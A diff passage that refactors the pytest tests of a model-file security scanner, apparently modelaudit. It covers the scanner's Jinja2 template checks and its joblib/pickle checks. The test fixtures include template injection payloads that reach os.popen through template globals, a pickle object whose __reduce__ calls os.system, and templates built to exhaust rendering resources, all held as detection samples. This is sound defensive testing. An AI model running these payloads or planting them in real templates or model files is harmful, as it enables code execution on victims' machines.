) + def test_unavailable_sandbox_worker_stays_clean_with_configured_budget( self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, + filename: str, + template_content: str, + budget: int, ) -> None: pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "direct-range-expression.jinja" - template_file.write_text("{{ range(100000) }}", encoding="utf-8") + template_file = tmp_path / filename + template_file.write_text(template_content, encoding="utf-8") - scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": 16}) + scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": budget}) monkeypatch.setattr( scanner, "_test_template_safety_with_budget", @@ -1999,45 +1905,7 @@ def test_unavailable_sandbox_worker_keeps_ordered_range_boundaries_clean( monkeypatch: pytest.MonkeyPatch, template_content: str, ) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "ordered-range-boundary.jinja" - template_file.write_text(template_content, encoding="utf-8") - - scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": 16}) - monkeypatch.setattr( - scanner, - "_test_template_safety_with_budget", - lambda _template_content: ("worker_unavailable", "AssertionError"), - ) - result = scanner.scan(str(template_file)) - - assert result.success is True - assert "scan_outcome" not in result.metadata - assert not [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] - - def test_unavailable_sandbox_worker_keeps_small_symbolic_range_delta_clean( - self, - tmp_path: Path, - monkeypatch: pytest.MonkeyPatch, - ) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "small-symbolic-range-delta.jinja" - template_file.write_text( - "{{ range(10 ** 1000, (10 ** 1000 + 2) - 1) }}", - encoding="utf-8", - ) - - scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": 65536}) - monkeypatch.setattr( - scanner, - "_test_template_safety_with_budget", - lambda _template_content: ("worker_unavailable", "AssertionError"), - ) - result = scanner.scan(str(template_file)) - - assert result.success is True - assert "scan_outcome" not in result.metadata - assert not [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] + _assert_clean_sandbox_range(tmp_path, monkeypatch, template_content, ("ordered-range-boundary.jinja")) @pytest.mark.parametrize( "template_content", @@ -2054,45 +1922,7 @@ def test_unavailable_sandbox_worker_keeps_scalar_and_lazy_range_filters_clean( monkeypatch: pytest.MonkeyPatch, template_content: str, ) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "bounded-range-filter.jinja" - template_file.write_text(template_content, encoding="utf-8") - - scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": 16}) - monkeypatch.setattr( - scanner, - "_test_template_safety_with_budget", - lambda _template_content: ("worker_unavailable", "AssertionError"), - ) - result = scanner.scan(str(template_file)) - - assert result.success is True - assert "scan_outcome" not in result.metadata - assert not [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] - - def test_unavailable_sandbox_worker_respects_shadowed_range_macro( - self, - tmp_path: Path, - monkeypatch: pytest.MonkeyPatch, - ) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "shadowed-range-macro.jinja" - template_file.write_text( - "{% macro range(_count) %}12{% endmacro %}{{ range(100001)|min }}", - encoding="utf-8", - ) - - scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": 16}) - monkeypatch.setattr( - scanner, - "_test_template_safety_with_budget", - lambda _template_content: ("worker_unavailable", "AssertionError"), - ) - result = scanner.scan(str(template_file)) - - assert result.success is True - assert "scan_outcome" not in result.metadata - assert not [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] + _assert_clean_sandbox_range(tmp_path, monkeypatch, template_content, ("bounded-range-filter.jinja")) @pytest.mark.parametrize( "template_content", @@ -2108,21 +1938,7 @@ def test_unavailable_sandbox_worker_respects_shadowed_range_in_eager_contexts( monkeypatch: pytest.MonkeyPatch, template_content: str, ) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "shadowed-range-eager.jinja" - template_file.write_text(template_content, encoding="utf-8") - - scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": 16}) - monkeypatch.setattr( - scanner, - "_test_template_safety_with_budget", - lambda _template_content: ("worker_unavailable", "AssertionError"), - ) - result = scanner.scan(str(template_file)) - - assert result.success is True - assert "scan_outcome" not in result.metadata - assert not [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] + _assert_clean_sandbox_range(tmp_path, monkeypatch, template_content, ("shadowed-range-eager.jinja")) def test_static_range_analysis_fails_closed_when_macro_expansion_budget_is_exhausted( self, @@ -2351,100 +2167,6 @@ def test_static_range_analysis_resolves_namespace_attr_filter(self, template_con assert scanner._template_has_static_render_budget_risk(template_content) is True - def test_unavailable_sandbox_worker_respects_overwritten_range_function_alias( - self, - tmp_path: Path, - monkeypatch: pytest.MonkeyPatch, - ) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "overwritten-range-function.jinja" - template_file.write_text( - "{% macro small(_count) %}12{% endmacro %}" - "{% set reducer = range %}{% set reducer = small %}{{ reducer(100001)|min }}", - encoding="utf-8", - ) - - scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": 16}) - monkeypatch.setattr( - scanner, - "_test_template_safety_with_budget", - lambda _template_content: ("worker_unavailable", "AssertionError"), - ) - result = scanner.scan(str(template_file)) - - assert result.success is True - assert "scan_outcome" not in result.metadata - assert not [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] - - def test_unavailable_sandbox_worker_fails_closed_for_large_range_loop( - self, - tmp_path: Path, - monkeypatch: pytest.MonkeyPatch, - ) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "range-loop.jinja" - template_file.write_text("{% for i in range(1000) %}{% endfor %}", encoding="utf-8") - - scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": 16}) - monkeypatch.setattr( - scanner, - "_test_template_safety_with_budget", - lambda _template_content: ("worker_unavailable", "AssertionError"), - ) - result = scanner.scan(str(template_file)) - - assert result.success is False - assert result.metadata["scan_outcome"] == "inconclusive" - budget_checks = [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] - assert len(budget_checks) == 1 - assert budget_checks[0].details["budget_type"] == "worker_unavailable" - - def test_unavailable_sandbox_worker_fails_closed_when_lazy_slice_is_iterated( - self, - tmp_path: Path, - monkeypatch: pytest.MonkeyPatch, - ) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "range-slice-loop.jinja" - template_file.write_text("{% for group in range(1000)|slice(10) %}{% endfor %}", encoding="utf-8") - - scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": 16}) - monkeypatch.setattr( - scanner, - "_test_template_safety_with_budget", - lambda _template_content: ("worker_unavailable", "AssertionError"), - ) - result = scanner.scan(str(template_file)) - - assert result.success is False - assert result.metadata["scan_outcome"] == "inconclusive" - budget_checks = [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] - assert len(budget_checks) == 1 - assert budget_checks[0].details["budget_type"] == "worker_unavailable" - - def test_unavailable_sandbox_worker_fails_closed_for_large_range_join( - self, - tmp_path: Path, - monkeypatch: pytest.MonkeyPatch, - ) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "range-join.jinja" - template_file.write_text("{{ range(1000)|join }}", encoding="utf-8") - - scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": 16}) - monkeypatch.setattr( - scanner, - "_test_template_safety_with_budget", - lambda _template_content: ("worker_unavailable", "AssertionError"), - ) - result = scanner.scan(str(template_file)) - - assert result.success is False - assert result.metadata["scan_outcome"] == "inconclusive" - budget_checks = [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] - assert len(budget_checks) == 1 - assert budget_checks[0].details["budget_type"] == "worker_unavailable" - def test_static_preflight_blocks_range_join_before_worker_start( self, monkeypatch: pytest.MonkeyPatch, @@ -2546,42 +2268,7 @@ def test_unavailable_sandbox_worker_keeps_non_amplifying_and_invalid_range_calls monkeypatch: pytest.MonkeyPatch, template_content: str, ) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "invalid-range.jinja" - template_file.write_text(template_content, encoding="utf-8") - - scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": 16}) - monkeypatch.setattr( - scanner, - "_test_template_safety_with_budget", - lambda _template_content: ("worker_unavailable", "AssertionError"), - ) - result = scanner.scan(str(template_file)) - - assert result.success is True - assert "scan_outcome" not in result.metadata - assert not [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] - - def test_unavailable_sandbox_worker_keeps_exact_saturated_power_quotient_clean( - self, - tmp_path: Path, - monkeypatch: pytest.MonkeyPatch, - ) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "exact-power-quotient.jinja" - template_file.write_text("{{ range((10 ** 101) // (10 ** 100))|list }}", encoding="utf-8") - - scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": 1000}) - monkeypatch.setattr( - scanner, - "_test_template_safety_with_budget", - lambda _template_content: ("worker_unavailable", "AssertionError"), - ) - result = scanner.scan(str(template_file)) - - assert result.success is True - assert "scan_outcome" not in result.metadata - assert not [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] + _assert_clean_sandbox_range(tmp_path, monkeypatch, template_content, ("invalid-range.jinja")) @pytest.mark.parametrize("numeric_text", ["x" * 4097, "0" * 4097]) def test_unavailable_sandbox_worker_keeps_long_non_amplifying_int_filters_clean( @@ -2630,95 +2317,12 @@ def test_unavailable_sandbox_worker_counts_large_range_tail( for check in result.checks ) - def test_unavailable_sandbox_worker_keeps_small_range_at_large_offset_clean( - self, - tmp_path: Path, - monkeypatch: pytest.MonkeyPatch, - ) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "large-offset-small-range.jinja" - template_file.write_text("{{ range(10 ** 13, 10 ** 13 + 1)|list }}", encoding="utf-8") - - scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": 64}) - monkeypatch.setattr( - scanner, - "_test_template_safety_with_budget", - lambda _template_content: ("worker_unavailable", "AssertionError"), - ) - result = scanner.scan(str(template_file)) - - assert result.success is True - assert "scan_outcome" not in result.metadata - assert not [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] - - def test_unavailable_sandbox_worker_fails_closed_for_materialized_lazy_range_filter( - self, - tmp_path: Path, - monkeypatch: pytest.MonkeyPatch, - ) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "range-select-list.jinja" - template_file.write_text("{{ range(1000)|select|list }}", encoding="utf-8") - - scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": 16}) - monkeypatch.setattr( - scanner, - "_test_template_safety_with_budget", - lambda _template_content: ("worker_unavailable", "AssertionError"), - ) - result = scanner.scan(str(template_file)) - - assert result.success is False - assert result.metadata["scan_outcome"] == "inconclusive" - budget_checks = [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] - assert len(budget_checks) == 1 - assert budget_checks[0].details["budget_type"] == "worker_unavailable" - - def test_unavailable_sandbox_worker_uses_rendered_size_for_range_list_fallback( - self, - tmp_path: Path, - monkeypatch: pytest.MonkeyPatch, - ) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "rendered-range-expression.jinja" - template_file.write_text("{{ range(300)|list }}", encoding="utf-8") - - scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": 1000}) - monkeypatch.setattr( - scanner, - "_test_template_safety_with_budget", - lambda _template_content: ("worker_unavailable", "AssertionError"), - ) - result = scanner.scan(str(template_file)) - - assert result.success is False - assert result.metadata["scan_outcome"] == "inconclusive" - budget_checks = [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] - assert len(budget_checks) == 1 - assert budget_checks[0].details["budget_type"] == "worker_unavailable" - def test_unavailable_sandbox_worker_fails_closed_for_multi_arg_static_expression_range( self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "range-expression.jinja" - template_file.write_text("{{ range(0, 10 ** 8)|list }}", encoding="utf-8") - - scanner = Jinja2TemplateScanner() - monkeypatch.setattr( - scanner, - "_test_template_safety_with_budget", - lambda _template_content: ("worker_unavailable", "AssertionError"), - ) - result = scanner.scan(str(template_file)) - - assert result.success is False - assert result.metadata["scan_outcome"] == "inconclusive" - budget_checks = [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] - assert len(budget_checks) == 1 - assert budget_checks[0].details["budget_type"] == "worker_unavailable" + _assert_static_range_failure(tmp_path, monkeypatch, ("{{ range(0, 10 ** 8)|list }}")) def test_unavailable_sandbox_worker_keeps_small_multi_arg_range_clean( self, @@ -2735,11 +2339,7 @@ def test_unavailable_sandbox_worker_keeps_small_multi_arg_range_clean( "_test_template_safety_with_budget", lambda _template_content: ("worker_unavailable", "AssertionError"), ) - result = scanner.scan(str(template_file)) - - assert result.success is True - assert "scan_outcome" not in result.metadata - assert not [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] + _assert_benign_sandbox_failure_clean(scanner, template_file) def test_unavailable_sandbox_worker_fails_closed_for_static_render_amplification( self, @@ -2765,118 +2365,19 @@ def test_unavailable_sandbox_worker_fails_closed_for_static_render_amplification assert len(budget_checks) == 1 assert budget_checks[0].details["budget_type"] == "worker_unavailable" - def test_unavailable_sandbox_worker_respects_configured_budget_for_string_repetition( - self, - tmp_path: Path, - monkeypatch: pytest.MonkeyPatch, - ) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "bounded-amplify.jinja" - template_file.write_text("{{ 'A' * 10000 }}", encoding="utf-8") - - scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": 65536}) - monkeypatch.setattr( - scanner, - "_test_template_safety_with_budget", - lambda _template_content: ("worker_unavailable", "AssertionError"), - ) - result = scanner.scan(str(template_file)) - - assert result.success is True - assert "scan_outcome" not in result.metadata - assert not [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] - - def test_unavailable_sandbox_worker_fails_closed_for_repeated_large_list_literal( - self, - tmp_path: Path, - monkeypatch: pytest.MonkeyPatch, - ) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "amplify-list-literal.jinja" - template_file.write_text("{{ ['ABCDEFGHIJKLMNOPQRST'] * 2 }}", encoding="utf-8") - - scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": 16}) - monkeypatch.setattr( - scanner, - "_test_template_safety_with_budget", - lambda _template_content: ("worker_unavailable", "AssertionError"), - ) - result = scanner.scan(str(template_file)) - - assert result.success is False - assert result.metadata["scan_outcome"] == "inconclusive" - budget_checks = [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] - assert len(budget_checks) == 1 - assert budget_checks[0].details["budget_type"] == "worker_unavailable" - - def test_unavailable_sandbox_worker_fails_closed_for_repeated_dict_list_literal( - self, - tmp_path: Path, - monkeypatch: pytest.MonkeyPatch, - ) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "amplify-dict-list-literal.jinja" - template_file.write_text(r"{{ [{'long_key': 'long_value'}] * 50 }}", encoding="utf-8") - - scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": 1000}) - monkeypatch.setattr( - scanner, - "_test_template_safety_with_budget", - lambda _template_content: ("worker_unavailable", "AssertionError"), - ) - result = scanner.scan(str(template_file)) - - assert result.success is False - assert result.metadata["scan_outcome"] == "inconclusive" - budget_checks = [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] - assert len(budget_checks) == 1 - assert budget_checks[0].details["budget_type"] == "worker_unavailable" - - def test_unavailable_sandbox_worker_keeps_integer_multiplication_clean( - self, - tmp_path: Path, - monkeypatch: pytest.MonkeyPatch, - ) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "integer-multiplication.jinja" - template_file.write_text("{{ 100000 * 100000 }}", encoding="utf-8") - - scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": 16}) - monkeypatch.setattr( - scanner, - "_test_template_safety_with_budget", - lambda _template_content: ("worker_unavailable", "AssertionError"), - ) - result = scanner.scan(str(template_file)) - - assert result.success is True - assert "scan_outcome" not in result.metadata - assert not [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] - def test_unavailable_sandbox_worker_fails_closed_for_static_sandbox_risk( self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "dunder.jinja" - template_file.write_text("{{ messages.__class__ }}", encoding="utf-8") - - scanner = Jinja2TemplateScanner() - monkeypatch.setattr( - scanner, - "_test_template_safety_with_budget", - lambda _template_content: ("worker_unavailable", "AssertionError"), + _assert_sandbox_unavailable( + tmp_path, + monkeypatch, + ("dunder.jinja"), + ("{{ messages.__class__ }}"), + ("worker_unavailable"), + ("AssertionError"), ) - result = scanner.scan(str(template_file)) - - assert result.has_errors is True - assert result.metadata["scan_outcome"] == "inconclusive" - budget_checks = [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] - assert len(budget_checks) == 1 - assert budget_checks[0].details["budget_type"] == "worker_unavailable" - failed_checks = [c for c in result.checks if c.name == "Jinja2 Template Injection Detection"] - assert any(c.details.get("pattern_type") == "sandbox_violation" for c in failed_checks) def test_sandbox_worker_memory_limit_uses_resource_baseline_without_statm( self, @@ -3017,25 +2518,13 @@ def test_non_finite_sandbox_budget_config_uses_defaults(self, value: float) -> N def test_sensitivity_high(self, tmp_path: Path) -> None: """Test high sensitivity mode.""" - template_file = tmp_path / "test.jinja" - template_file.write_text("{% for item in items %}{{ item }}{% endfor %}") - - scanner = Jinja2TemplateScanner(config={"sensitivity_level": "high"}) - result = scanner.scan(str(template_file)) - # High sensitivity should still complete - assert result.success is True + _assert_template_sensitivity(tmp_path, ("high")) def test_sensitivity_low(self, tmp_path: Path) -> None: """Test low sensitivity mode.""" - template_file = tmp_path / "test.jinja" - template_file.write_text("{% for item in items %}{{ item }}{% endfor %}") - - scanner = Jinja2TemplateScanner(config={"sensitivity_level": "low"}) - result = scanner.scan(str(template_file)) - # Low sensitivity should still complete - assert result.success is True + _assert_template_sensitivity(tmp_path, ("low")) def test_skip_common_patterns_enabled(self, tmp_path: Path) -> None: """Test that common ML patterns are skipped when configured.""" @@ -3064,25 +2553,11 @@ class TestJinja2TemplateScannerStandaloneFiles: def test_scans_jinja_file(self, tmp_path: Path) -> None: """Test scanning of .jinja file.""" - template_file = tmp_path / "test.jinja" - template_file.write_text("{{ self.__init__.__globals__['os'] }}") - - scanner = Jinja2TemplateScanner() - result = scanner.scan(str(template_file)) - - failed_checks = [c for c in result.checks if c.status == CheckStatus.FAILED] - assert len(failed_checks) > 0 + _assert_critical_template(tmp_path, ("test.jinja"), ("{{ self.__init__.__globals__['os'] }}")) def test_scans_j2_file(self, tmp_path: Path) -> None: """Test scanning of .j2 file.""" - template_file = tmp_path / "test.j2" - template_file.write_text("{{ config.__class__.__init__.__globals__ }}") - - scanner = Jinja2TemplateScanner() - result = scanner.scan(str(template_file)) - - failed_checks = [c for c in result.checks if c.status == CheckStatus.FAILED] - assert len(failed_checks) > 0 + _assert_critical_template(tmp_path, ("test.j2"), ("{{ config.__class__.__init__.__globals__ }}")) class TestJinja2TemplateCommittedCorpus: @@ -3207,3 +2682,178 @@ def test_metadata_includes_file_size(self, tmp_path: Path) -> None: assert "file_size" in result.metadata assert result.metadata["file_size"] > 0 + + +def _assert_template_sensitivity(tmp_path: Path, sensitivity: str) -> None: + template_file = tmp_path / "test.jinja" + template_file.write_text("{% for item in items %}{{ item }}{% endfor %}") + + scanner = Jinja2TemplateScanner(config={"sensitivity_level": sensitivity}) + result = scanner.scan(str(template_file)) + + # High sensitivity should still complete + assert result.success is True + + +def _assert_sandbox_risk_after_budget(tmp_path: Path, filename: str, template: str) -> None: + pytest.importorskip("jinja2.sandbox") + template_file = tmp_path / filename + template_file.write_text(template, encoding="utf-8") + + result = Jinja2TemplateScanner( + { + "sandbox_render_max_output_chars": 16, + "sandbox_render_timeout_seconds": 2, + } + ).scan(str(template_file)) + + assert result.metadata["scan_outcome"] == "inconclusive" + budget_checks = [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] + assert len(budget_checks) == 1 + assert budget_checks[0].details["budget_type"] == "budget_exceeded" + failed_checks = [c for c in result.checks if c.name == "Jinja2 Template Injection Detection"] + assert any(c.details.get("pattern_type") == "sandbox_violation" for c in failed_checks) + + +def _assert_active_request_template(tmp_path: Path, template: str) -> None: + tokenizer_file = tmp_path / "tokenizer_config.json" + tokenizer_file.write_text( + json.dumps({"chat_template": (template)}), + encoding="utf-8", + ) + + result = Jinja2TemplateScanner().scan(str(tokenizer_file)) + + assert any( + check.severity == IssueSeverity.CRITICAL + and check.details.get("pattern_type") == "critical_injection" + and check.details.get("match_text") == "requests." + for check in _jinja_detection_checks(result) + ) + + +def _assert_static_range_failure(tmp_path: Path, monkeypatch: pytest.MonkeyPatch, source_text: str) -> None: + pytest.importorskip("jinja2.sandbox") + template_file = tmp_path / "range-expression.jinja" + template_file.write_text(source_text, encoding="utf-8") + + scanner = Jinja2TemplateScanner() + monkeypatch.setattr( + scanner, + "_test_template_safety_with_budget", + lambda _template_content: ("worker_unavailable", "AssertionError"), + ) + result = scanner.scan(str(template_file)) + + assert result.success is False + assert result.metadata["scan_outcome"] == "inconclusive" + budget_checks = [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] + assert len(budget_checks) == 1 + assert budget_checks[0].details["budget_type"] == "worker_unavailable" + + +def _assert_malformed_json_ssti(tmp_path: Path, padding_size: int, file_limit: int) -> None: + tokenizer_file = tmp_path / "tokenizer_config.json" + payload = "{{ lipsum.__globals__.os.popen('id').read() }}" + tokenizer_file.write_text( + '{"chat_template":"' + ("a" * padding_size) + payload + ("b" * file_limit), + encoding="utf-8", + ) + + result = Jinja2TemplateScanner().scan(str(tokenizer_file)) + + assert result.metadata["scan_outcome"] == "inconclusive" + assert "jinja2_json_parse_failed" in result.metadata["scan_outcome_reasons"] + failed_checks = [c for c in result.checks if c.name == "Jinja2 Template Injection Detection"] + assert failed_checks + assert any(str(c.details.get("template_location")).startswith("raw_json_parse_fallback") for c in failed_checks) + + aggregate_result = scan_model_directory_or_file( + str(tokenizer_file), + config={"cache_scan_results": False}, + ) + assert determine_exit_code(aggregate_result) == 1 + + +def _assert_sandbox_range_budget( + tmp_path: Path, monkeypatch: pytest.MonkeyPatch, template_content: str, filename: str +) -> None: + pytest.importorskip("jinja2.sandbox") + template_file = tmp_path / filename + template_file.write_text(template_content, encoding="utf-8") + + scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": 16}) + monkeypatch.setattr( + scanner, + "_test_template_safety_with_budget", + lambda _template_content: ("worker_unavailable", "AssertionError"), + ) + result = scanner.scan(str(template_file)) + + assert result.success is False + assert result.metadata["scan_outcome"] == "inconclusive" + budget_checks = [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] + assert len(budget_checks) == 1 + assert budget_checks[0].details["budget_type"] == "worker_unavailable" + + +def _assert_critical_template(tmp_path: Path, filename: str, source_text: str) -> None: + template_file = tmp_path / filename + template_file.write_text(source_text) + + scanner = Jinja2TemplateScanner() + result = scanner.scan(str(template_file)) + + failed_checks = [c for c in result.checks if c.status == CheckStatus.FAILED] + assert len(failed_checks) > 0 + + +def _assert_sandbox_unavailable( + tmp_path: Path, monkeypatch: pytest.MonkeyPatch, filename: str, template: str, classification: str, error_type: str +) -> None: + pytest.importorskip("jinja2.sandbox") + template_file = tmp_path / filename + template_file.write_text(template, encoding="utf-8") + + scanner = Jinja2TemplateScanner() + monkeypatch.setattr( + scanner, + "_test_template_safety_with_budget", + lambda _template_content: (classification, error_type), + ) + result = scanner.scan(str(template_file)) + + assert result.has_errors is True + assert result.metadata["scan_outcome"] == "inconclusive" + budget_checks = [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] + assert len(budget_checks) == 1 + assert budget_checks[0].details["budget_type"] == "worker_unavailable" + failed_checks = [c for c in result.checks if c.name == "Jinja2 Template Injection Detection"] + assert any(c.details.get("pattern_type") == "sandbox_violation" for c in failed_checks) + + +def _assert_clean_sandbox_range( + tmp_path: Path, monkeypatch: pytest.MonkeyPatch, template_content: str, filename: str +) -> None: + pytest.importorskip("jinja2.sandbox") + template_file = tmp_path / filename + template_file.write_text(template_content, encoding="utf-8") + + scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": 16}) + monkeypatch.setattr( + scanner, + "_test_template_safety_with_budget", + lambda _template_content: ("worker_unavailable", "AssertionError"), + ) + result = scanner.scan(str(template_file)) + + assert result.success is True + assert "scan_outcome" not in result.metadata + assert not [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] + + +def _assert_benign_sandbox_failure_clean(scanner: Jinja2TemplateScanner, template_file: Path) -> None: + result = scanner.scan(str(template_file)) + assert result.success is True + assert "scan_outcome" not in result.metadata + assert not [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] diff --git a/tests/scanners/test_joblib_scanner.py b/tests/scanners/test_joblib_scanner.py index 6d8e00a6b..f9a1103c5 100644 --- a/tests/scanners/test_joblib_scanner.py +++ b/tests/scanners/test_joblib_scanner.py @@ -16,6 +16,7 @@ import joblib from modelaudit.scanners.joblib_scanner import JoblibScanner +from tests.helpers.scanners import track_bytesio_close _ASSETS_DIR = Path(__file__).resolve().parents[1] / "assets" @@ -177,16 +178,7 @@ def test_joblib_scanner_fails_before_large_decompression_allocation(tmp_path: Pa def test_joblib_scanner_closes_bytesio(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> None: """Ensure BytesIO objects used for pickles are closed.""" - import io - - closed = {} - - class TrackedBytesIO(io.BytesIO): - def close(self) -> None: - closed["closed"] = True - super().close() - - monkeypatch.setattr(io, "BytesIO", TrackedBytesIO) + closed = track_bytesio_close(monkeypatch) path = tmp_path / "model.joblib" joblib.dump({"a": np.arange(5)}, path, compress=3) diff --git a/tests/scanners/test_joblib_scanner_codecs.py b/tests/scanners/test_joblib_scanner_codecs.py index 5767ad3fe..e9e2f4f98 100644 --- a/tests/scanners/test_joblib_scanner_codecs.py +++ b/tests/scanners/test_joblib_scanner_codecs.py @@ -39,6 +39,10 @@ ) from modelaudit.scanners.pickle_scanner import PickleScanner from modelaudit.utils.file.detection import _LZ4_FRAME_MAGIC, validate_file_type_with_formats +from tests.helpers.file_creators import SystemCommandPayload +from tests.helpers.file_creators import ( + joblib_numpy_raw_segment as _joblib_numpy_raw_segment, +) class _FakeLz4FrameDecompressor: @@ -86,13 +90,6 @@ def _install_fake_lz4( monkeypatch.setattr(CompressedScanner, "_get_lz4_frame_module", staticmethod(lambda: fake_lz4_frame)) -class _Payload: - def __reduce__(self) -> tuple[object, tuple[str]]: - import os - - return (os.system, ("echo owned",)) - - def _has_system_reduce_failure(result: ScanResult) -> bool: return any( check.status == CheckStatus.FAILED @@ -334,11 +331,6 @@ def _shared_structured_dtype_graph(*, depth: int = 7, fanout: int = 8) -> _Jobli return child -def _joblib_numpy_raw_segment(prefix_length: int, raw_data: bytes) -> bytes: - padding_length = 16 - ((prefix_length + 1) % 16) - return bytes([padding_length]) + (b"\xff" * padding_length) + raw_data - - def _joblib_numpy_list_payload( *, leading_ops: bytes = b"", @@ -461,7 +453,7 @@ def test_safe_parser_accepts_bounded_bytearray8_before_numpy_payload(tmp_path: P def test_scan_detects_raw_protocol0_pickle_joblib(tmp_path: Path) -> None: - payload = pickle.dumps(_Payload(), protocol=0) + payload = pickle.dumps(SystemCommandPayload("echo owned"), protocol=0) result = _scan_payload(tmp_path, payload, "raw_protocol0.joblib") @@ -470,7 +462,7 @@ def test_scan_detects_raw_protocol0_pickle_joblib(tmp_path: Path) -> None: def test_scan_detects_truncated_raw_protocol0_pickle_joblib(tmp_path: Path) -> None: - payload = pickle.dumps(_Payload(), protocol=0)[:-1] + payload = pickle.dumps(SystemCommandPayload("echo owned"), protocol=0)[:-1] result = _scan_payload(tmp_path, payload, "truncated_raw_protocol0.joblib") @@ -489,7 +481,7 @@ def test_scan_detects_truncated_raw_persistent_id_joblib(tmp_path: Path, payload def test_scan_detects_raw_protocol0_pickle_after_large_literal(tmp_path: Path) -> None: - payload = pickle.dumps(["A" * 5000, _Payload()], protocol=0) + payload = pickle.dumps(["A" * 5000, SystemCommandPayload("echo owned")], protocol=0) result = _scan_payload(tmp_path, payload, "large_prefix_raw_protocol0.joblib") @@ -1239,7 +1231,7 @@ def test_scan_revalidates_dtype_when_python_object_ids_collide( ) -> None: first_prefix = b"\x80\x02](" + _joblib_numpy_wrapper_control(shape=1, dtype="i8") first_raw = _joblib_numpy_raw_segment(len(first_prefix), b"\x00" * 8) - nested_pickle = pickle.dumps(_Payload(), protocol=2).ljust(48, b"X") + nested_pickle = pickle.dumps(SystemCommandPayload("echo owned"), protocol=2).ljust(48, b"X") second_control = b"0" + _joblib_numpy_wrapper_control(shape=6, dtype="O8") second_prefix_length = len(first_prefix) + len(first_raw) + len(second_control) payload = ( @@ -1272,7 +1264,7 @@ def test_scan_revalidates_memoized_dtype_after_build_mutation(tmp_path: Path) -> + _binunicode("O8") + b"\x89\x88\x87RK\x00\x86sK\x08K\x01K\x1btb0" ) - nested_pickle = pickle.dumps(_Payload(), protocol=2).ljust(48, b"X") + nested_pickle = pickle.dumps(SystemCommandPayload("echo owned"), protocol=2).ljust(48, b"X") second_wrapper = _joblib_numpy_wrapper_with_dtype_control(b"h\x1e", shape=6) payload = first_prefix + (b"\x00" * 8) + b"0" + dtype_mutation + second_wrapper + nested_pickle + b"e." @@ -1284,7 +1276,7 @@ def test_scan_revalidates_memoized_dtype_after_build_mutation(tmp_path: Path) -> def test_scan_rejects_invalid_numpy_wrapper_constructor_hiding_nested_pickle(tmp_path: Path) -> None: - nested_pickle = pickle.dumps(_Payload(), protocol=2) + nested_pickle = pickle.dumps(SystemCommandPayload("echo owned"), protocol=2) wrapper = 